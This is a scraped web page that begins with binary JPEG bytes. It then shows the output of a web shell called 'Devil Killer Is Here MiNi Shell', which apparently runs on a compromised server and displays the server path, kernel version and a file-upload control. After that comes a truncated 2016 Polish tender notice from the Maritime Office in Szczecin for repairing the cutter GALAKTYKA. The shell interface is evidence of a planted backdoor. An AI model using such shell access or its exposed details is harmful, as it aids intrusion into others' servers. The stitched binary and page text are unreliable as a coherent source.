JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160830/303611-N-2016.html

      <div class="divRow_xforms">
         <div>Ogłoszenie nr 303611 - 2016
              z dnia 2016-08-30 r.</div>
         <div style="text-align: center" class="headerMedium_xforms">
            Szczecin: Remont jednostki k/h GALAKTYKA w celu odnowienia klasy PRS
            <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
         </div>
         <div>
            <b>Zamieszczanie ogłoszenia:</b>
            obowiązkowe
         </div>
         <div>
            <b>Ogłoszenie dotyczy:</b>
            zamówienia publicznego
         </div>
         <div>
            <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            <b>Nazwa projektu lub programu</b>
            <br />
         </div>
         <div>
            <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br />
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA I: ZAMAWIAJĄCY</u>
         </div>
         <div style="padding-left: 20px">
            <b>Postępowanie przeprowadza centralny zamawiający</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>
            <br />
            <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />
            <br />
            <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b>
            <br />
            <b>Informacje dodatkowe:</b>
            <br />
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>I. 1) NAZWA I ADRES:</b>
               Dyrektor Urzędu Morskiego w Szczecinie, krajowy numer identyfikacyjny
              14501700000, ul.
              Plac Batorego 
              4,
              70207  
              Szczecin, woj.
              zachodniopomorskie, państwo
              , tel.
              91 4403423, 4403523, e-mail
              zamowienia@ums.gov.pl, faks
              914 403 441.
               <br />
               Adres strony internetowej (URL): www.ums.gov.pl
               <br />
               Adres profilu nabywcy:

                www.ums.gov.pl
               <br />
            </div>
            <div style="text-align: left">
               <b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>
               Administracja rządowa terenowa
            </div>
            <div style="text-align: left">
               <b>
                  I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA
                  <i>(jeżeli dotyczy)</i>
                  :
               </b>
               <div style="padding-left: 20px">
                  Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                  <br />
               </div>
            </div>
            <div style="text-align: left">
               <b>I.4) KOMUNIKACJA:</b>
               <br />
               <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b>
               <div style="padding-left: 20px">
                  tak
                  <br />
                  www.ums.gov.pl
               </div>
               <br />
               <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia</b>
               <div style="padding-left: 20px">
                  tak
                  <br />
                  www.ums.gov.pl
               </div>
               <br />
               <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
               </div>
               <br />
               <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b>
               <br />
               <b>Elektronicznie</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  adres
                  <br />
               </div>
               <br />
               <div style="padding-left: 20px">
                  <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b>
                  <br />
                  nie
                  <br />
                  <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b>
                  <br />
                  tak
                  <br />
                  Inny sposób:
                  <br />
                  za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca
                  <br />
                  Adres:
                  <br />
                  Urząd Morski w Szczecinie, pl. Stefana Batorego 4, 70-207 Szczecin, Zespół ds. Zamówień Publicznych pok. nr 110
               </div>
               <br />
               <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                  <br />
               </div>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA II: PRZEDMIOT ZAMÓWIENIA</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <br />
               <b>II.1) Nazwa nadana zamówieniu przez zamawiającego:</b>
               Remont jednostki k/h GALAKTYKA w celu odnowienia klasy PRS
               <br />
               <b>Numer referencyjny:</b>
               PO-II-370/ZZP-3/18/16
               <br />
               <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b>
               <br />
               <div style="padding-left: 20px; text-align: justify">nie</div>
               <br />
               <b>II.2) Rodzaj zamówienia:</b>
               usługi
               <br />
               <b>II.3) Informacja o możliwości składania ofert częściowych</b>
               <br />
               Zamówienie podzielone jest na części:
               <br />
               <div style="padding-left: 20px">Nie</div>
               <br />
               <br />
               <b>II.4) Krótki opis przedmiotu zamówienia</b>
               <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i>
               <b>a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
               1.Kuter hydrograficzny (kadłub stalowy), nazwa: GALAKTYKA
    2.Długość całkowita 	29,20 m
    3.Szerokość 	6,82 m
    4.Zanurzenie maksymalne	1,75 m
    5.Pojemność brutto    	111,20
    6.Ciężar statku	127
    7.Napęd główny/moc/przekładnia WOLA typ 200.135V12 TC 440kW 4R 25
    8.Silniki pomocnicze/moc	2 x SW 266 -28 kW
    9.Klasyfikator 	PRS nr rejestru - 620347
    10.Rok budowy/miejsce budowy 1974 r. Tczewska Stocznia Rzeczna
    Ogólna charakterystyka robót ( ogólny opis przedmiotu zamówienia):
    Zakres prac:
    1)Prace  związane z przyjęciem statku do remontu;
    2)Remont kadłuba (czyszczenie i malowanie);
    3)Prace związane ze sterem, śrubą napędową, linią wału;
    4)Remont zaworów oraz skrzyń kingstonowych;
    5)Prace pokładowe związane z wymianą polera cumowniczego i odbojnicy,
    remont urządzeń pokładowych;
    6)Remont łazienki;
    7)Czyszczenie i konserwacja zbiorników;
    8)Remont kapitalny silników agregatów wraz z wymianą części demontażem i  montażem do remontu;
    9)Montaż nowych pomp wody w agregatach;
    10)Prace w maszynie: prądnic i przekładni SG, przegląd chłodnicy silnika
    głównego, remont pomp i sprężarki;
    11)Montaż klimatyzacji;
    12)Prace elektryczne.
               <br />
               <br />
               <b>II.5) Główny kod CPV:</b>
               50241000-6
               <br />
               <b>Dodatkowe kody CPV:</b>
               45112723-9
               <br />
               <b>II.6) Całkowita wartość zamówienia</b>
               <i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>
               :
               <br />
               Wartość bez VAT:
              430000.00
               <br />
               Waluta:
               <br />
               <div style="padding-left: 20px">
                  PLN
                  <br />
                  <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i>
               </div>
               <br />
               <b>II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:</b>
               nie
               <br />
               <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b>
               <div style="padding-left: 20px">
                  Okres w miesiącach: 30
                  <br />
               </div>
               <br />
               <b>II.9) Informacje dodatkowe:</b>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b>
                  <br />
                  Określenie warunków:
                
    a)Zamawiający w celu dokonania oceny tego warunku, żąda aktualnych Świadectw Uznania klasyfikatora statków
                  <br />
                  Informacje dodatkowe
                  <br />
                  <b>III.1.2)  Sytuacja finansowa lub ekonomiczna</b>
                  <br />
                  Określenie warunków:
                
    a)Zamawiający w celu dokonania oceny tego warunku, żąda dokumentów potwierdzających że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego
                  <br />
                  Informacje dodatkowe
                  <br />
                  <b>III.1.3) Zdolność techniczna lub zawodowa</b>
                  <br />
                  Określenie warunków:
                
    a)Zamawiający w celu dokonania oceny tego warunku żąda wykazu usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy;
    b)wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami
                  <br />
                  Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                  <br />
                  Informacje dodatkowe:
               </div>
               <b>III.2) PODSTAWY WYKLUCZENIA</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b>
                  <br />
                  <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                  <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                  <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                  <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                  <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                  <br />
               </div>
               <b>III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI</b>
               <br />
               <div style="padding-left: 20px">
                  <b>Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu</b>
                  <br />
                  tak
                  <br />
                  <b>Oświadczenie o spełnianiu kryteriów selekcji</b>
                  <br />
                  nie
               </div>
               <b>III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:</b>
               <br />
               <div style="padding-left: 20px">1)Oświadczenie Wykonawcy o braku podstaw wykluczenia z postępowania na postawie art. 25a ust.1  ustawy Pzp dotyczące przesłanek wykluczenia z postępowania na podstawie art. 24 ust 1 pkt 12-23 oraz 24 ust 5 pkt 1 i 4  według wzoru stanowiącego Załącznik nr 2 do niniejszej SIWZ</div>
               <b>III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b>
                  <br />
                  2)Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu składane na podstawie art. 25a ust.1 ustawy Pzp, według wzoru stanowiącego Załącznik nr 3 do niniejszej SIWZ.
                  <br />
                  <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b>
                  <br />
               </div>
               <b>III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP</b>
               <br />
               <div style="padding-left: 20px">a)wykaz usług  Załącznik nr 5 z w ostatnich trzech latach, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał co najmniej 3 usługi polegające na remoncie jednostki podobnej do objętej przedmiotem zamówienia o wartości co najmniej 100 000 zł (sto tysięcy złotych) każda.
    b)Wykaz osób  Załącznik nr 6.  Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wykaże się niezbędnym minimum tj. musi dysponować  jedną osobą, posiadającą uprawnienia do wykonywania prac spawalniczych. Zakres uprawnień świadectwa spawacza powinien obejmować zakres prac spawalniczych przewidzianych w remoncie. Wymieniona w wykazie osoba powinna posiadać aktualne świadectwo uznane przez klasyfikatora statków.
    W przypadku Wykonawców zagranicznych dopuszcza się równoważne kwalifikacje, nabyte w innych państwach członkowskich Unii Europejskiej, uznane przez klasyfikatorów statków państw członkowskich Unii Europejskiej zgodnie z postanowieniami ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. (Dz. U. 2015 poz. 659 z dnia 14.05.2015 r.)</div>
               <b>III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)</b>
               <div style="padding-left: 20px">1. Wszyscy Wykonawcy, w terminie 3 dni od zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 przekazują Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej stanowiące Załącznik nr 4 do niniejszej SIWZ. Wraz ze złożeniem oświadczenia Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia
    2. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą ma obowiązek złożyć następujące oświadczenia i dokumenty
    1)W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących kompetencji lub uprawnień  Zamawiający żąda następujących dokumentów:
    a)Aktualnego Świadectwa Uznania klasyfikatora statków (ważnego przez cały okres realizacji zamówienia) do wykonywania następujących prac:
    - pomiarów stopnia zużycia elementów oraz parametrów regulacyjnych okrętowych silników wysokoprężnych i n/w mechanizmów.
    - remontów głównych i pomocniczych silników wysokoprężnych, mechanizmów pomocniczych, pomp wodnych, pomp olejowych, pomp paliwowych, wciągarek kotwicznych, cumowniczych i holowniczych
    z napędem elektrycznym i hydraulicznym,
    b)Aktualnego Świadectwa Uznania klasyfikatora statków (ważnego przez cały okres realizacji zamówienia) do wykonania pomiarów grubości kadłubów jednostek metodą ultradźwiękową.
    3. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej Zamawiający żąda następujących dokumentów:
    a)opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 1 000 000,00 zł; (słownie jeden milion złotych)
    Polisa lub inny dokument powinien obowiązywać przez cały okres realizacji zamówienia.
    4. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda następujących dokumentów:
    a)odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.</div>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA IV: PROCEDURA</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>IV.1) OPIS</b>
               <br />
               <b>IV.1.1) Tryb udzielenia zamówienia:</b>
               przetarg nieograniczony
               <br />
               <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b>
               <div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />
                  1.	Zamawiający wymaga wniesienia wadium w kwocie: 12 000,00 zł (słownie dwanaście tysięcy zł)
    2.	Wadium może być wniesione w następujących formach, według wyboru Wykonawcy:
    1)	pieniądzu, wpłaconym przelewem na rachunek bankowy Urzędu Morskiego w Szczecinie w Narodowym Banku Polskim O/O Szczecin Nr  06 1010 1599 0028 9913 9120 0000 ;
    2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
    3)	gwarancjach bankowych;
    4)	gwarancjach ubezpieczeniowych;
    5)	poręczeniach udzielanych przez podmioty, o których mowa w   art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz.U. z 2016 r., poz. 359).
    3.	Wadium wnosi się przed upływem terminu składania ofert. Wadium musi obejmować cały okres związania ofertą.
    4.	Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania.
    5.	Kserokopię wniesienia wadium w formie pieniężnej należy dołączyć do oferty. W przypadku złożenia wadium w formie określonej w ust.2 pkt 2-5 do oferty należy załączyć kserokopię pokwitowania świadczącego o zdeponowaniu oryginałów dokumentów w kasie Urzędu. Kasa Urzędu czynna w godz. 10:00-13:00
    6.	Zamawiający dokona niezwłocznie zwrotu wadium :
    1)	wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 8;
    2)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, po zawarciu umowy  w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano;
    3)	na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
    7.	Jeżeli wadium zostanie wniesione w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
    8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie nie złożył oświadczeń lub dokumentów potwierdzających okoliczności o których mowa w art. 25 ust. 1 oświadczenia, o którym mowa w art. 25 ust.1, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3 , co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
    9.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
    1)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
    2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
    3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
    10.	 Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art.46 ust. 4a i ust 5 ustawy Pzp.
               </div>
               <br />
               <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b>
               <div style="padding-left: 20px">nie</div>
               <br />
               <b>IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
               </div>
               <br />
               <b>IV.1.5.) Wymaga się złożenia oferty wariantowej:</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Dopuszcza się złożenie oferty wariantowej
                  <br />
                  nie
                  <br />
                  Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                  <br />
                  nie
               </div>
               <br />
               <b>IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</b>
               <br />
               <i>(przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)</i>
               <div style="padding-left: 20px">
                  Liczba wykonawców  
                  <br />
                  Przewidywana minimalna liczba wykonawców
                  <br />
                  Maksymalna liczba wykonawców  
                  <br />
                  Kryteria selekcji wykonawców:
                  <br />
               </div>
               <br />
               <b>IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:</b>
               <div style="padding-left: 20px">
                  Umowa ramowa będzie zawarta:
                  <br />
                  <br />
